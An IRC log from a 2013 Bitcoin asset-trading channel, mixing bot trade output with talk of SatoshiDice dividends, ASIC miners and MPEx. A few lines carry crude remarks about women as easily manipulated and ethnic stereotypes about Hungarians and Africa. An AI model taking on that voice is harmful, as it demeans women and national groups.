no spam. Mar 04 04:03:30 dub: I haven't called you a racist yet. Mar 04 04:03:56 midnightmagic: you're gettign there, its par for the course with you (you'd make a terrible anthropologist) Mar 04 04:04:45 dub: Is it now. I'm.. glad you're paying such close attention to my activity that you think you have me pegged. Mar 04 04:04:47 ZOMG https://bitcointalk.org/index.php?topic=93445.msg1580072#msg1580072 Mar 04 04:05:50 midnightmagic: I don't really have time to go through this, there is quite a bit of literature out there Mar 04 04:05:53 During the BDT experience, because i was very concerned about the high interest bond and the lack of supporting high revenues i've made the decision (unethical, possibly illegal) to repurpose some of the funds raised with the IPO. Mar 04 04:05:53 Those funds were invested through some chinese partners of mine in asic equipment. Mar 04 04:06:26 [BTCTC] [GSDPT] 5 @ 0.0059 = 0.0295 BTC [+] Mar 04 04:06:48 dub: Much of the literature usually cited to conclude such things has been thoroughly debunked, so perhaps someday when you're willing to cite, after making such assertions, I'd be glad to read and evaluate such studies. Mar 04 04:06:54 midnightmagic: regarding the chinese, not your culteral naivety Mar 04 04:08:10 yes, well I'm more of an experience guy than a take debunkment at face value guy. Dorkins calls it the belief gene, though I don't really believe it exists. Mar 04 04:08:22 dub: Making negative assertions about the person you are having a discussion with is not usually productive. I'm readjusting my evaluation of your random, seemingly-connected comments post-statement. Mar 04 04:08:47 midnightmagic: its an observation grounded in experience, not a negative assertion Mar 04 04:09:12 dub: I'm fairly sure your evaluation of my cultural "naivete" is based on incomplete data. Mar 04 04:10:01 dub: Also, if you are an experience guy, then why are you pointing to external data as the foundation of your assertions rather than just your experience? Mar 04 04:10:17 midnightmagic: thats easy, it closely mirrors what I have observed Mar 04 04:10:28 this is a genetic/language thing thats been done to death << it's not genetic, it's cultural. Mar 04 04:10:30 dub: I'll presume you are aware of the notion of confirmation bias. Mar 04 04:11:36 whoop, you just did it :D Mar 04 04:12:12 Those funds were invested through some chinese partners of mine in asic equipment. <<< ahaha epic Mar 04 04:12:31 midnightmagic: and I'f I were a victim of that would I need to have read about this before or after observing it? Mar 04 04:13:16 dub: ALl that's required is that you reject well-grounded studies that disagree with your opinion, while selecting out those studies which agree with it or reinforce it in some fashion. Mar 04 04:13:58 I guess at some point, some people like to actually form an opinion Mar 04 04:15:18 dub: Sure, course. Nothing wrong with an opinion so long as data can update it. Mar 04 04:16:10 the problem is you can likely produce data to refute any opinion as can I Mar 04 04:16:56 dub: Lots of people think that, but it is also possible to assess the quality of the data. So, IMO, no, it's not possible to find quality data which refutes any opinion. Mar 04 04:17:16 dub: Or rather, it's not possible for me.. Mar 04 04:18:52 i'd like to continue this and know it looks like weasling out Mar 04 04:19:03 but im not in a meeting, on teh phone, and working to a thight deadline Mar 04 04:19:09 /snot/now Mar 04 04:19:16 I'm sorry you think that. You should realise that the implication is that I am aserting my mind can be changed. Mar 04 04:19:18 and typing without looking at my screen Mar 04 04:20:51 Unlike most people, I am not interested (this time) in simply honing my ability to refute. If and when you come up with actual cites, I'd be happy to look them up. I still have fulltext research credentials at the local university. Mar 04 04:22:14 [BTCTC] [COGNITIVE] 3 @ 0.29 = 0.87 BTC [-] Mar 04 04:22:40 now how'dja get that eh ? by exploiting the masses Mar 04 04:22:47 by 'olding on to outdated imperialist dogma Mar 04 04:23:05 which perpetuates the social and economic differences Mar 04 04:23:08 within our society. Mar 04 04:23:16 If there's ever going to be any progress... Mar 04 04:25:00 dub: Also, stop asserting stupid things about me. Mar 04 04:28:41 so what happened with sdice divs? Mar 04 04:29:33 ;;seen evoorhees Mar 04 04:29:33 evoorhees was last seen in #bitcoin-assets 2 weeks, 5 days, 3 hours, 55 minutes, and 34 seconds ago: perfect Mar 04 04:29:41 well, contract says they got till the 5th Mar 04 04:29:56 hmm Mar 04 04:30:44 midnightmagic: a little while ago there was a conversation where you appeared to be floored by the notion that in some locations/cultures the base assumption of a strangers actions being altruistic was false Mar 04 04:31:29 I wonder if bitcoiners are going to experiment with different governance rules / contracts than you usually see in the real world. Which is usually majority of shares. Mar 04 04:31:35 dub: I was floored by the fact that it was so *in that specific locale*. Mar 04 04:32:07 midnightmagic: its not the only time you have appeared to me to base your arguments around a world view couched in priviledged western culture Mar 04 04:33:20 I guess mircea_popescu pledges to be the benevolent dictator of MPEx forever, after reading a bit through the contract. Mar 04 04:33:35 Eduard_Munteanu let me dig that out for you Mar 04 04:33:50 http://trilema.com/2013/so-whats-the-plan-with-mpoempex/ Mar 04 04:34:24 haha mp you made my day ! https://bitcointalk.org/index.php?topic=124441.msg1517002#msg1517002 Mar 04 04:34:49 Eduard_Munteanu also, re the rules etc, http://trilema.com/2012/the-mpex-rota/ http://trilema.com/2013/rota-post-mortem/ Mar 04 04:35:05 error4733 lol Mar 04 04:35:34 if at least he had the guts to post something like "Same" Mar 04 04:35:40 that'd have earned him some respect Mar 04 04:35:44 but... weasels everywhere. Mar 04 04:35:56 midnightmagic: my memory of it is different, I don't think we were discussing a specific place, only the existence of such places Mar 04 04:36:01 sometimes i suspect there's like five balls in three ballsacks available in the entire continental us. Mar 04 04:36:35 mircea_popescu: out of curiosity, did Silk Road ever approach you? To get listed, raise money and so forth. Mar 04 04:36:58 i've not made a comment on the topic so far. Mar 04 04:37:15 I see. Mar 04 04:37:22 anyway, if I don't want this PM to actually climb up my ass I need to deliver some shit so I'm closing this term Mar 04 04:37:42 aha Mar 04 04:37:57 dub: It is a cultural perversion of what appears to be the most successful strategy for human progress. Mar 04 04:39:25 good read mircea Mar 04 04:40:15 ;) Mar 04 04:41:34 take the girls up and down the river? wtf Mar 04 04:41:49 i thought you were talkig about your daughters or something, till i click on the pics lul wtf Mar 04 04:42:02 im not married / don't have kids. Mar 04 04:42:32 Hmm, you know... they also said underground resources belong to the state... wouldn't surprise me if they deem Bitcoin mining a national resource as well. :) Mar 04 04:42:49 that'll be very much their problem entirely. Mar 04 04:42:55 lul and these girls are your friends and you just hang out wtih them? Mar 04 04:43:10 BitHub im hung so i hang. Mar 04 04:43:53 making a porno or something? Mar 04 04:44:25 to quote, http://trilema.com/2009/eu-am-un-succes-nebun-la-femei/ Mar 04 04:44:31 (nu means no) Mar 04 04:44:37 i hope that's me in 5 years haha Mar 04 04:45:12 Heh. Mar 04 04:45:55 why wait five years, i always say. Mar 04 04:46:05 trying to be realistic Mar 04 04:46:24 it did just give me a huge boost of motivation tho Mar 04 04:46:55 srsly, girls are easy. you just have to make them feel safe they'll do anything. Mar 04 04:47:31 Like investors. :P Mar 04 04:47:35 indeed. Mar 04 04:47:59 money first, then girls Mar 04 04:53:54 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1134 = 0.2268 BTC [+] Mar 04 04:55:35 [MPEX] [O.BTCUSD.C330T] 8 @ 0.29248665 = 2.3399 BTC [+] Mar 04 04:55:40 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.22360455 = 223.6046 BTC [-] Mar 04 04:55:53 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.19808896 = 198.089 BTC [-] Mar 04 05:08:19 BitHub> money first, then girls (this does work well) Mar 04 05:08:45 anyone happen to know off the top of their head how many avolons were made in batch one? or the total hashing power? Mar 04 05:13:59 approx 200 Mar 04 05:14:25 based on a 500,000 NRE cost on the chips I assume there will be at least 600 total on the first "batch" of chips Mar 04 05:14:28 why do you want to know? Mar 04 05:19:42 i want to know how much asic miner shares are worth Mar 04 05:22:18 600 times 60 ghs.... Mar 04 05:22:41 that is a lot, hmm Mar 04 05:23:05 just wonder if bfl will fail hard, are they still bumping or whatever? Mar 04 05:27:35 [MPEX] [S.DICE] 1000 @ 0.00550011 = 5.5001 BTC [-] Mar 04 05:27:37 [MPEX] [S.DICE] 500 @ 0.0055001 = 2.7501 BTC [-] Mar 04 05:36:06 midnightmagic: indeed, saw an interesting article about the very young having much greater altrustic tendancies which increases survival odds in an 'all the adults are dead' scenario Mar 04 05:47:19 dub: I'm trying to dig up the log because I'm curious what I was thinking at the time. I've actually grown up in a place (yes, they exist even in Canada) where one must assume the stranger is evil. Mar 04 05:47:30 dub: Do you have any more keywords for me to search on? Mar 04 05:51:27 midnightmagic: egrep -i '(dub.*eastern.*europe)' \#bitcoin-assets.log Mar 04 05:51:37 thanks Mar 04 05:51:50 stupid split logs anyway.. Mar 04 05:52:06 amusing false positive: 29-11-12-13:45 kakobreklaaa it's sharpie in pooper you person of dubious eastern european origin you Mar 04 05:52:28 midnightmagic: 12-12-12-20:59 Mar 04 05:52:40 thats US eastern Mar 04 05:53:08 lol Mar 04 05:55:46 dub: *AWESOME* you just found for me the reference to the mpoe-pr boob pic that I've been searching for forever. Mar 04 05:56:04 lol ?! Mar 04 05:56:06 we aim to please Mar 04 05:56:23 mircea_popescu: Hey man, in that log on that day you're talking about that boobpic I've been trying to grep for forever. Mar 04 05:57:15 cool Mar 04 05:57:28 you've prolly given bithub even more determination charges. Mar 04 05:57:48 mircea_popescu: Who me? Mar 04 05:57:55 yes you. Mar 04 05:58:03 What are determination charges? Mar 04 05:58:43 " it did just give me a huge boost of motivation tho" Mar 04 05:59:12 i guess i used the wrong word Mar 04 06:01:33 dub: All I see is "[18:01:08] dub: What a horrible way to live, in constant fear." I guess all I can say is that's not a statement born of ignorance. Mar 04 06:01:54 I may have been quoting blade runner. Mar 04 06:03:29 (alternatively) Mar 04 06:04:14 ;;ticker Mar 04 06:04:14 BTCUSD ticker | Best bid: 34.42598, Best ask: 34.57010, Bid-ask spread: 0.14412, Last trade: 34.42349, 24 hour volume: 14866.21945414, 24 hour low: 33.80000, 24 hour high: 34.61000, 24 hour vwap: 34.21380 Mar 04 06:10:47 [MPEX] [S.BBET] 72000 @ 0.00175 = 126 BTC [-] Mar 04 06:10:49 [MPEX] [S.BBET] 500 @ 0.00196988 = 0.9849 BTC [+] Mar 04 06:10:51 [MPEX] [S.BBET] 555 @ 0.00196989 = 1.0933 BTC [+] Mar 04 06:10:52 [MPEX] [S.BBET] 1945 @ 0.00197 = 3.8317 BTC [+] Mar 04 06:11:46 dice took a beating today Mar 04 06:12:29 up 10% from yesterday Mar 04 06:13:41 [BTCTC] [BTC-BOND] 35 @ 0.00999 = 0.3497 BTC [+] Mar 04 06:16:24 o hey Mar 04 06:16:27 !ticker m s.bbet Mar 04 06:16:29 [MPEX:S.BBET] 1D: 0.00175 / 0.00175879 / 0.00197 (75000 shares, 131.91 BTC), 7D: 0.00175 / 0.00177002 / 0.00197 (79299 shares, 140.36 BTC), 30D: 0.0003 / 0.00165663 / 0.00197 (127408 shares, 211.07 BTC) Mar 04 06:16:45 lol more than half the month;s volume Mar 04 06:20:03 (28+74) * 1.1/1.5 Mar 04 06:20:10 ;;calc (28+74) * 1.1/1.5 Mar 04 06:20:10 74.8 Mar 04 06:22:03 [BTCTC] [GSDPT] 29 @ 0.0059 = 0.1711 BTC [+] Mar 04 06:23:03 I got out of dice just before it came tumbling Mar 04 06:23:09 im pissed I have900 shares left.. Mar 04 06:23:12 >_> Mar 04 06:24:35 [BTCTC] [BTC-TRADING-PT] 70 @ 0.099 = 6.93 BTC [-] Mar 04 06:27:09 [MPEX] [S.DICE] 2000 @ 0.00550001 = 11 BTC [-] Mar 04 06:30:31 Why's SD tanking..? Mar 04 06:30:41 .. er.. if it's tanking. Mar 04 06:33:06 BTC is getting more and more valuable Mar 04 06:33:12 and less and less people bet Mar 04 06:36:12 less and less people bet? Doesn't look like it Mar 04 06:36:38 head over to http:///blockchain.info Mar 04 06:36:56 it's the SatoshiDice show Mar 04 06:37:30 Bitcoin should be renamed "Satoshi Dice presents Bitcoin" Mar 04 06:38:34 lol Mar 04 06:38:47 midnightmagic i think people are shifty yet. Mar 04 06:39:11 after 2 years of pretty much nothing but scam after scam after scam many feel uneasy about keeping btc invested in same place Mar 04 06:39:29 you know the joke about the guy who cashed his bank account because he wanted to count his money ? something of the sort. Mar 04 06:40:47 [MPEX] [S.MPOE] 7 @ 0.00077068 = 0.0054 BTC [-] Mar 04 06:41:02 [MPEX] [S.MPOE] 493 @ 0.00077068 = 0.3799 BTC [-] Mar 04 06:42:15 [MPEX] [S.DICE] 2000 @ 0.00550001 = 11 BTC [-] Mar 04 06:42:45 hrm. interesting. Mar 04 06:51:33 [MPEX] [S.DICE] 1000 @ 0.00550001 = 5.5 BTC [-] Mar 04 06:51:46 [BTCTC] [GSDPT] 700 @ 0.0059 = 4.13 BTC [+] Mar 04 06:52:16 ;;ticker Mar 04 06:52:16 BTCUSD ticker | Best bid: 34.60667, Best ask: 34.61000, Bid-ask spread: 0.00333, Last trade: 34.61000, 24 hour volume: 14786.71661983, 24 hour low: 33.80000, 24 hour high: 34.61000, 24 hour vwap: 34.22162 Mar 04 06:52:24 hm Mar 04 06:55:27 low volume Mar 04 07:05:41 mircea_popescu &/or kakobrekla Mar 04 07:05:48 Any of you around? Mar 04 07:05:49 yea ? Mar 04 07:08:14 BBET statement says 5.44167918 BTC to be distributed as dividends. On 10 million shares, that's like 54.4 satoshi per share, but MPEx shows 32 satoshi per share. What's with that? Mar 04 07:09:10 ;;ticker Mar 04 07:09:11 BTCUSD ticker | Best bid: 34.45894, Best ask: 34.50000, Bid-ask spread: 0.04106, Last trade: 34.50000, 24 hour volume: 15041.28017977, 24 hour low: 33.80000, 24 hour high: 34.61000, 24 hour vwap: 34.22749 Mar 04 07:18:36 Namworld mpex got confused by the mistaken notion that 5mn shares are actually out Mar 04 07:18:40 in reality only 3 are Mar 04 07:23:26 odd Mar 04 07:24:40 So long as the amount shown in my stats are good. But odd for the display. Mar 04 08:03:14 [HAVELOCK] [SDICE] 4 @ 0.61 = 2.44 BTC [-] Mar 04 08:34:51 "с умопомрачительным дизайном и таким же юзабилити :)" Mar 04 08:34:55 ok, who dunnit! Mar 04 08:53:29 me Mar 04 09:02:36 for shame Mar 04 09:08:31 [BTCTC] [GSDPT] 150 @ 0.0059 = 0.885 BTC [+] Mar 04 09:10:00 anyone know what's the holdup with paying out the march 1st bfl bet http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ ? Mar 04 09:11:35 http://www.unifycall.com/update/3avalon.jpg Mar 04 09:13:43 Molecular. That bet paid out already Mar 04 09:14:28 There was some issues with transaction size limits, info in a triilrma post Mar 04 09:14:46 Bugpowder, oh Mar 04 09:15:03 I got my coins Mar 04 09:15:06 At least Mar 04 09:15:09 Bugpowder, me too. lol Mar 04 09:15:24 Bugpowder, I thought it'd state the payouts on the site... rechecking, maybe I just overlooked Mar 04 09:15:45 Bowjob: what the hell man where's that Mar 04 09:15:48 1mb was too small for the total transaction! Had to be split Mar 04 09:15:58 China Mar 04 09:16:04 Bowjob: Oh. I guess I knew that. Mar 04 09:16:06 The dude now has 5 of those babies Mar 04 09:16:16 Bowjob: One of their Chinese customers stripped it apart I think and took a picture. Mar 04 09:16:25 yeah Mar 04 09:16:29 ballsy move Mar 04 09:16:34 very, imo Mar 04 09:16:44 molecular ya was paid like 2 days ago Mar 04 09:16:48 or 3 Mar 04 09:16:53 when i get mine, id be making $30 a day lol Mar 04 09:17:08 I just hope BFL fucks up again, just pleaseee Mar 04 09:17:12 lol Mar 04 09:17:17 what's the april one at Mar 04 09:17:44 60ish not bad Mar 04 09:17:58 looks like avalon will deliver their promise by april 1st Mar 04 09:18:05 not sure on bfl Mar 04 09:18:11 [BTCTC] [BTC-TRADING-PT] 1 @ 0.115 BTC [+] Mar 04 09:18:37 Bowjob: Last update said something about all b#1 orders will have been shipped by mar 10, and everyone should have them by mid- to end of march.. Mar 04 09:18:56 so then bet is right on point Mar 04 09:19:00 I really never thought Avalon would beat them all to the punch like this. Mar 04 09:19:22 I threw some orders at them just for the appreciation of their work with Icarus. Mar 04 09:19:24 midnightmagic it's an avalon/asicminer tie so far, apparently. Mar 04 09:19:36 so its avalon 1, then bfl 1.. then avalon 2? Mar 04 09:19:38 mircea_popescu: *technically* Avalon boxes started hashing first. :) Mar 04 09:20:01 then theres this hungarian company that apparently made an asic as well Mar 04 09:20:01 mircea_popescu: And in the hands of actual customers.. Mar 04 09:20:07 okay, but you need eyeglasses to separate it Mar 04 09:20:08 available for pick up Mar 04 09:20:17 Bowjob: Is that Reclaimer? Mar 04 09:20:25 I thought he was russian.. Mar 04 09:20:31 no Mar 04 09:20:39 Not Tycho then. Mar 04 09:20:45 primeasic Mar 04 09:21:05 hungary.. is it a safe place? Mar 04 09:21:11 Bowjob: There's also a 22nm asic SOC vendor that's farming out chips to board designers. Mar 04 09:21:23 yeah, yifu is interested in that as well Mar 04 09:21:27 in sweden i think Mar 04 09:21:56 mining competition is gonna be really tough this year Mar 04 09:22:07 my electricity costs are 10 cents per kwh Mar 04 09:23:26 well, its 6.8 cents for the first 1350 KW, then the rest is billed at 10.12 cents thereafter Mar 04 09:23:27 mhm Mar 04 09:23:35 Bowjob: I'm currently at 0.0865 CAD/KwH Mar 04 09:23:42 or.. kWh or whatever. Mar 04 09:23:47 where Mar 04 09:24:09 electricity doesnt matter at this point.. not yet anyway Mar 04 09:24:10 Bowjob: consumer wins, we just have to time our buys right.. Mar 04 09:24:13 its the first who gets the asic Mar 04 09:24:39 Bowjob: I suspect if we care about power consumption now, we'll end up winning in the long run. They're all priced approximately the same. Mar 04 09:27:09 Bowjob: There's an *enormous* wave of mining customers coming soon-ish due to the sudden tidal wave price. Getting in line at this point for summertime asic is going to be a bad move.. Mar 04 09:41:22 [MPEX] [S.DICE] 17 @ 0.00560002 = 0.0952 BTC [+] Mar 04 09:48:36 getting in line is always a bad move. Mar 04 09:48:46 wtf is this even, "getting in line" Mar 04 09:56:02 [MPEX] [S.MPOE] 6115 @ 0.00076564 = 4.6819 BTC [-] Mar 04 09:56:03 [MPEX] [S.MPOE] 4400 @ 0.00077068 = 3.391 BTC [+] Mar 04 09:56:05 [MPEX] [S.MPOE] 1357 @ 0.00077069 = 1.0458 BTC [+] Mar 04 10:06:20 who here holds ltc :) Mar 04 10:07:47 [BTCTC] [BTC-BOND] 10 @ 0.00983 = 0.0983 BTC [-] Mar 04 10:08:02 [BTCTC] [BTC-BOND] 11 @ 0.009821 = 0.108 BTC [-] Mar 04 10:08:58 [BTCTC] [B.YABMC] 28 @ 0.0075 = 0.21 BTC [-] **** BEGIN LOGGING AT Mon Mar 4 18:04:48 2013 Mar 04 18:13:58 [BTCTC] [GSDPT] 100 @ 0.00573 = 0.573 BTC [-] Mar 04 18:14:00 [BTCTC] [GSDPT] 100 @ 0.00561 = 0.561 BTC [-] Mar 04 18:15:11 ;;ticker Mar 04 18:15:11 BTCUSD ticker | Best bid: 35.20000, Best ask: 35.30000, Bid-ask spread: 0.10000, Last trade: 35.30000, 24 hour volume: 28845.84682379, 24 hour low: 33.98600, 24 hour high: 35.35000, 24 hour vwap: 34.73691 Mar 04 18:22:48 [BTCTC] [GSDPT] 290 @ 0.00561 = 1.6269 BTC [-] Mar 04 18:39:42 [BTCTC] [GSDPT] 319 @ 0.00561 = 1.7896 BTC [-] Mar 04 18:51:28 Who wants some S.DICE before the dividend arrives? Mar 04 18:51:39 (PT) Mar 04 19:10:37 &estimate Mar 04 19:10:38 Next difficulty estimate | 4859710.18648 based on data since last change | 4903754.75592 based on data for last three days Mar 04 19:10:47 ;;ticker Mar 04 19:10:47 BTCUSD ticker | Best bid: 36.00000, Best ask: 36.00714, Bid-ask spread: 0.00714, Last trade: 36.00000, 24 hour volume: 34856.36975002, 24 hour low: 33.99871, 24 hour high: 36.15000, 24 hour vwap: 34.95547 Mar 04 19:12:28 nice Mar 04 19:15:17 ;;goxlag Mar 04 19:15:22 106.133771 seconds Mar 04 19:15:37 washappening Mar 04 19:20:19 [HAVELOCK] [SDICE] 3 @ 0.595 = 1.785 BTC [-] Mar 04 19:25:02 price going up again and again Mar 04 19:25:15 is what is happening Mar 04 19:25:26 No one wants S.DICE-PT? Mar 04 19:28:18 [HAVELOCK] [SDICE] 5 @ 0.595 = 2.975 BTC [-] Mar 04 19:33:17 [HAVELOCK] [SDICE] 12 @ 0.595 = 7.14 BTC [-] Mar 04 19:34:48 [MPEX] [S.DICE] 555 @ 0.00594999 = 3.3022 BTC [-] Mar 04 19:34:50 [MPEX] [S.DICE] 445 @ 0.00595 = 2.6478 BTC [+] Mar 04 19:44:11 [BTCTC] [BTC-MINING] 2 @ 0.034 = 0.068 BTC [-] Mar 04 19:48:45 [MPEX] [S.MPOE] 6771 @ 0.00076784 = 5.199 BTC [-] Mar 04 19:48:47 [MPEX] [S.MPOE] 1779 @ 0.00077999 = 1.3876 BTC [+] Mar 04 20:00:02 [HAVELOCK] [SDICE] 6 @ 0.595 = 3.57 BTC [-] Mar 04 20:05:28 Anyone know where Erik has been travelling? Mar 04 20:08:45 I think he went to the Earth's core or something. Unfortunately there's no vehicle capable of reaching there and he started his journey by jumping in a volcano. Mar 04 20:11:00 lol what ?! Mar 04 20:11:27 Spouting random made up stuff. Mar 04 20:11:33 Isn't that the beginning of the Scientology story? Mar 04 20:11:39 yeah lol Mar 04 20:11:41 Maybe he's working on selling S.DICE to the crab people Mar 04 20:11:54 What? Is it? Mar 04 20:12:11 I thought spouting random stuff was Bitcoin's national sport. Mar 04 20:12:23 But apparently what I'm saying was not random at all. Mar 04 20:12:43 :p Mar 04 20:12:43 depends on who ya ask Mar 04 20:12:53 "everything new in this world is the history you didn't know" Mar 04 20:13:26 So, someone moved 10,000 BTC back into MPEx: Mar 04 20:13:28 http://blockchain.info/tx/34ee8eb5d04ec6a278223b0ea02a36c9104710e6cdd02a5d5ece9b03533d6b5e Mar 04 20:14:03 yeah that was me Mar 04 20:14:46 Buy everything! Mar 04 20:14:55 too bad its erik Mar 04 20:14:57 I'm thinking it's evoorhees Mar 04 20:15:09 be my guess Mar 04 20:15:10 I'm thinking S.DICE dividend Mar 04 20:15:18 Go S.DICE! Mar 04 20:15:37 its funny that he moved it all in instead of just 1750 though Mar 04 20:15:41 But why 10k? Mar 04 20:16:04 hmm... nvm Mar 04 20:16:13 it is definitely him Mar 04 20:16:31 How do you know? Mar 04 20:16:35 Not sure why 10k Mar 04 20:16:46 because that address is from when he withdrew 10k last time Mar 04 20:16:54 and he said on the forum that he just deposited Mar 04 20:16:54 ah Mar 04 20:17:03 great Mar 04 20:17:21 Dunno why the whole 10k though Mar 04 20:17:44 prop up the S.DICE value post div ;-) Mar 04 20:17:46 maybe he just didn't think about it, was in a hurry Mar 04 20:18:17 i dunno, if i was moving $350000 wort of coins, i think i'd stop to "think about it" Mar 04 20:18:18 on a mobile phone Mar 04 20:18:40 correction $363,800 Mar 04 20:19:16 Namworld: scientoglogist prophet! Mar 04 20:21:09 correction 365,000 Mar 04 20:23:02 But why 10k? he has to pay 50mn shares Mar 04 20:23:43 Only 13mn shares on the market. Mar 04 20:23:44 [MPEX] [S.MPOE] 1868 @ 0.00077999 = 1.457 BTC [+] Mar 04 20:23:46 [MPEX] [S.MPOE] 9982 @ 0.00078 = 7.786 BTC [+] Mar 04 20:24:07 but maybe I don't understand the backend Mar 04 20:24:19 13mn in third party hands on the market + 37 mn in erik's hands on the market = 50mn Mar 04 20:24:32 +50mn which make up the golden ticket = 100mn, whole float. Mar 04 20:26:10 price is going... up Mar 04 20:26:14 ;;ticker Mar 04 20:26:14 BTCUSD ticker | Best bid: 36.31083, Best ask: 36.44000, Bid-ask spread: 0.12917, Last trade: 36.33499, 24 hour volume: 41528.95196789, 24 hour low: 33.99871, 24 hour high: 36.50000, 24 hour vwap: 35.17091 Mar 04 20:26:38 So he still has to pay divs to the 37mn shares that aren't on the market? Mar 04 20:26:52 how aren't they on the market ? Mar 04 20:26:57 I new I should have waited a few more hours before buying something on bitcoinstore.com Mar 04 20:27:02 I should say, that he hasn't sold yet Mar 04 20:27:03 lol Mar 04 20:27:15 maximian well yes, shares get dividends. Mar 04 20:27:19 makes no diff who owns them Mar 04 20:28:23 the confusion may come in the Dividends box Mar 04 20:28:25 info Mar 04 20:28:32 So shouldn't last month's divs have been 10,000 BTC instead of 2,000? Mar 04 20:28:54 maximian but last month there literally were only 10mn on the market. Mar 04 20:28:55 Hashrate over 40TH/s Mar 04 20:29:02 ah, ok Mar 04 20:29:40 as per contract Mar 04 20:30:16 maximian this is designed to reinforce proof. Mar 04 20:30:26 mpex won't let someone pay fewer shares than actually are issued Mar 04 20:30:40 so every time a dividend is pay you actually know the actual exact total, from the receipt. Mar 04 20:30:53 [MPEX] [S.MPOE] 6000 @ 0.00078 = 4.68 BTC [+] Mar 04 20:31:47 good to know. I had forgotten that the contracted allowed for evoorhees to put another 40mn shares on the market last month. Mar 04 20:32:59 [MPEX] [S.DICE] 1000 @ 0.00594999 = 5.95 BTC [-] Mar 04 20:33:05 it also works to reinforce proof the other way Mar 04 20:33:15 someone declares X dividends, he'd better be able to show the cash too Mar 04 20:33:40 [MPEX] [S.DICE] 355 @ 0.00595 = 2.1123 BTC [+] Mar 04 20:34:25 [MPEX] [S.DICE] 2000 @ 0.00597999 = 11.96 BTC [+] Mar 04 20:34:52 &estimate Mar 04 20:35:12 Next difficulty estimate | 4825329.9214 based on data since last change | 4946742.16185 based on data for last three days Mar 04 20:36:03 36.53 Mar 04 20:36:14 AAPL @ 2 year low Mar 04 20:36:22 GOOG at all time hi Mar 04 20:36:31 ;;ident burnside Mar 04 20:36:32 Nick 'burnside', with hostmask 'burnside!~burnside@12.9.242.2', is not identified. Mar 04 20:37:04 Bugpowder im curious how Ts will go. Mar 04 20:38:04 ;bc,convert eur Mar 04 20:38:13 ;;bc,convert eur Mar 04 20:38:13 1 BTC = 36.70000 U.S. dollars = 28.2568525 Euros Mar 04 20:39:02 yeah Mar 04 20:39:05 me too Mar 04 20:41:00 ;;bc,xau Mar 04 20:41:01 1 XAU = 1573.500000000000 USD = 43.0861572542 BTC Mar 04 20:41:18 [BTCTC] [BASIC-MINING] 3 @ 0.3333 = 0.9999 BTC [-] Mar 04 20:41:46 [BTCTC] [BASIC-MINING] 30 @ 0.33317 = 9.9951 BTC [-] Mar 04 20:42:36 Got a good one for bitbet Mar 04 20:43:00 The price of a 25BTC Casascius coin > 1 Kruggerand. Mar 04 20:43:18 haha put it in Mar 04 20:43:29 I should take a side by side pic and post to reddit as well. Mar 04 20:43:34 totally. Mar 04 20:43:57 ;;calc 36.70*25 Mar 04 20:43:58 917.5 Mar 04 20:44:50 Hmm Mar 04 20:44:56 Whats a good time frame Mar 04 20:45:00 April 1? Mar 04 20:45:05 nah Mar 04 20:45:15 April 15? Mar 04 20:45:42 need at least a month Mar 04 20:45:57 lets just extrapolate linearly Mar 04 20:46:02 and use that as the date Mar 04 20:46:34 ;;calc 43/25 Mar 04 20:46:34 1.72 Mar 04 20:47:14 34% growth last month Mar 04 20:47:18 lets do 2 months Mar 04 20:48:36 hate when ppl use math :) Mar 04 20:50:29 1st of may, worker's day Mar 04 20:53:13 yah Mar 04 20:54:46 Don't tell me MPEx is closed for 1st of May. :) Mar 04 20:56:31 lol Mar 04 20:56:40 mpex hasn't actually been closed yet Mar 04 20:56:56 much unlike everyone else. Mar 04 20:56:59 there was a ~hour ddos a while back, but that's all. Mar 04 21:00:04 [HAVELOCK] [SDICE] 9 @ 0.6 = 5.4 BTC [+] Mar 04 21:03:36 who runs betsofbitco.in? Mar 04 21:13:33 ;;ident FabianB Mar 04 21:13:34 Nick 'FabianB', with hostmask 'FabianB!~ogg@unaffiliated/fabianb', is identified as user fabianb, with GPG key id 797C1106D52E79DF, key fingerprint 9B854E5F36B927C9C365F208797C1106D52E79DF, and bitcoin address 18Wnjc1fcWDboZDHNsn48URtwGaqRjPnAt Mar 04 21:23:44 [BTCTC] [ASICMINER-PT] 5 @ 0.655 = 3.275 BTC Mar 04 21:23:46 [BTCTC] [ASICMINER-PT] 8 @ 0.65 = 5.2 BTC [-] Mar 04 21:23:47 [BTCTC] [ASICMINER-PT] 15 @ 0.65 = 9.75 BTC [-] Mar 04 21:23:49 [BTCTC] [ASICMINER-PT] 11 @ 0.65 = 7.15 BTC [-] Mar 04 21:23:51 [BTCTC] [ASICMINER-PT] 10 @ 0.65 = 6.5 BTC [-] Mar 04 21:23:52 [BTCTC] [ASICMINER-PT] 16 @ 0.65 = 10.4 BTC [-] Mar 04 21:23:54 [BTCTC] [ASICMINER-PT] 6 @ 0.65 = 3.9 BTC [-] Mar 04 21:23:56 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 04 21:23:58 [BTCTC] [ASICMINER-PT] 50 @ 0.65 = 32.5 BTC [-] Mar 04 21:28:30 lol @O.BTCUSD.C370T Mar 04 21:28:53 bot's out of options so the people are fighting! Mar 04 21:29:08 !ticker btct asicminer-pt Mar 04 21:29:10 [BTCT:ASICMINER-PT] 1D: 0.65 / 0.6502 / 0.655 (122 shares, 79.3 BTC), 7D: 0.65 / 0.6502 / 0.655 (122 shares, 79.3 BTC), 30D: 0.65 / 0.6502 / 0.655 (122 shares, 79.3 BTC) Mar 04 21:29:35 you're out of options? so early in month? Mar 04 21:32:27 there goes all my shares cuz getting BTC in DK over the weekend sucks Mar 04 21:32:36 [BTCTC] [BASIC-MINING] 5 @ 0.34499 = 1.725 BTC [+] Mar 04 21:33:30 lmao "Budapest is known for a hub of scamming activity" Mar 04 21:33:52 that primeasic thread starts being juicy Mar 04 21:35:02 heheh i just read that too Mar 04 21:35:14 well, if the hungarian govt is considered, that's fair assessment Mar 04 21:35:23 ouch Mar 04 21:37:22 Nice, the asicminer pass-through went active Mar 04 21:38:06 jurov a shitton sold on those lines Mar 04 21:38:28 actually budapest is known as a hub for porn. Mar 04 21:39:00 mircea, have you seen wikipedia's world penis length map? Mar 04 21:39:32 hungary looks like a piece of africa there Mar 04 21:41:46 fuuu .65 Mar 04 21:42:03 temptation to sell rising Mar 04 21:42:04 [MPEX] [S.DICE] 3 @ 0.0055 = 0.0165 BTC [-] Mar 04 21:44:59 i hope kim dotcom gets credit for inventing 